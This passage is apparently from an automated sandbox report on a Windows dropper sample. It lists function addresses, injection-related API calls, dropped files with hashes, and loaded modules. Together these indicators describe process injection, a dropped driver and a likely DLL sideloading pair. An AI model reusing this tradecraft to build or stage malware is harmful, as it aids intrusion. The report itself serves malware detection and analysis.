              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_0299FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,6_2_0299FCD8
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_0299FD38 LoadLibraryExA,GetProcAddress,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,6_2_0299FD38
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029BF340 NtdllDefWindowProc_A,GetCapture,6_2_029BF340
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029D3114 NtdllDefWindowProc_A,6_2_029D3114
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029DB684 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,6_2_029DB684
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029BF5FD NtdllDefWindowProc_A,6_2_029BF5FD
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029D38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_029D38CC
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029D3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_029D3990
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029B3E00 GetSubMenu,SaveDC,RestoreDC,NtdllDefWindowProc_A,6_2_029B3E00
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_02A2CA40
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A4A1DD0_2_02A4A1DD
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029D21600_2_029D2160
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A1C5080_2_02A1C508
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A4AACF0_2_02A4AACF
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A3EFBB0_2_02A3EFBB
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A48D180_2_02A48D18
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A4906B0_2_02A4906B
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A5BA280_2_02A5BA28
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A459D60_2_02A459D6
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A03E000_2_02A03E00
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00408C605_2_00408C60
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_0040DC115_2_0040DC11
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00407C3F5_2_00407C3F
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00418CCC5_2_00418CCC
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00406CA05_2_00406CA0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004028B05_2_004028B0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_0041A4BE5_2_0041A4BE
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00408C605_2_00408C60
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004182445_2_00418244
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004016505_2_00401650
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00402F205_2_00402F20
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004193C45_2_004193C4
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004187885_2_00418788
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00402F895_2_00402F89
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00402B905_2_00402B90
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004073A05_2_004073A0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_31B4DAE05_2_31B4DAE0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_31B4CEC85_2_31B4CEC8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_31B4D2105_2_31B4D210
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_31B410305_2_31B41030
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_31B40FD05_2_31B40FD0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_3556ED705_2_3556ED70
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_3556F45B5_2_3556F45B
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_355697B95_2_355697B9
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35565A905_2_35565A90
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_355662885_2_35566288
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_3556CAA05_2_3556CAA0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_3556BC885_2_3556BC88
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_355600405_2_35560040
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_3556001A5_2_3556001A
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_355698F85_2_355698F8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_355692305_2_35569230
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C0C4D05_2_35C0C4D0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C01C205_2_35C01C20
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C056485_2_35C05648
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C061B05_2_35C061B0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C0A0E85_2_35C0A0E8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C052205_2_35C05220
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C015305_2_35C01530
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C086805_2_35C08680
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C0D9085_2_35C0D908
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C022785_2_35C02278
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_35C06A305_2_35C06A30
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_360B11A05_2_360B11A0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_360BF2B05_2_360BF2B0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_361B48515_2_361B4851
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00408C605_1_00408C60
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_0040DC115_1_0040DC11
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00407C3F5_1_00407C3F
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00418CCC5_1_00418CCC
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00406CA05_1_00406CA0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_004028B05_1_004028B0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_0041A4BE5_1_0041A4BE
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00408C605_1_00408C60
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_004182445_1_00418244
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_004016505_1_00401650
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00402F205_1_00402F20
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_004193C45_1_004193C4
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_004187885_1_00418788
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00402F895_1_00402F89
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00402B905_1_00402B90
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_004073A05_1_004073A0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_355696085_2_35569608
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029821606_2_02982160
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029CC5086_2_029CC508
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029B3E006_2_029B3E00
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00408C608_2_00408C60
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_0040DC118_2_0040DC11
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00407C3F8_2_00407C3F
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00418CCC8_2_00418CCC
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00406CA08_2_00406CA0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_004028B08_2_004028B0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_0041A4BE8_2_0041A4BE
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00408C608_2_00408C60
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_004182448_2_00418244
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_004016508_2_00401650
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00402F208_2_00402F20
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_004193C48_2_004193C4
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_004187888_2_00418788
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00402F898_2_00402F89
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00402B908_2_00402B90
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_004073A08_2_004073A0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_31B5DAF08_2_31B5DAF0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_31B5CED88_2_31B5CED8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_31B5D2208_2_31B5D220
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_31B510308_2_31B51030
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_31B50FD08_2_31B50FD0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_354295408_2_35429540
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_3542ED708_2_3542ED70
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_3542F45B8_2_3542F45B
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35425E008_2_35425E00
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_354262888_2_35426288
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_3542CAA08_2_3542CAA0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_3542BC888_2_3542BC88
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_354200408_2_35420040
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_354200068_2_35420006
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA54008_2_35AA5400
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AAC6A08_2_35AAC6A0
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA71508_2_35AA7150
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA58288_2_35AA5828
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA63908_2_35AA6390
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AAAAAF8_2_35AAAAAF
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AAA2C88_2_35AAA2C8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AADAC88_2_35AADAC8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA6C108_2_35AA6C10
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA24588_2_35AA2458
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA17108_2_35AA1710
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AA88608_2_35AA8860
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_35AAAACD8_2_35AAAACD
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_354298E98_2_354298E9
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\netutils.dll C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: String function: 029D4980 appears 77 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: String function: 029D4788 appears 78 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: String function: 029D6B54 appears 86 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: String function: 029D4B0C appears 363 times
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: String function: 02984B0C appears 363 times
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: String function: 02986B54 appears 86 times
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: String function: 02984980 appears 77 times
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: String function: 0040D606 appears 72 times
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: String function: 0040E1D8 appears 129 times
              Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamead753d94-f829-499e-a4a4-e302c212bbe7.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename2 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
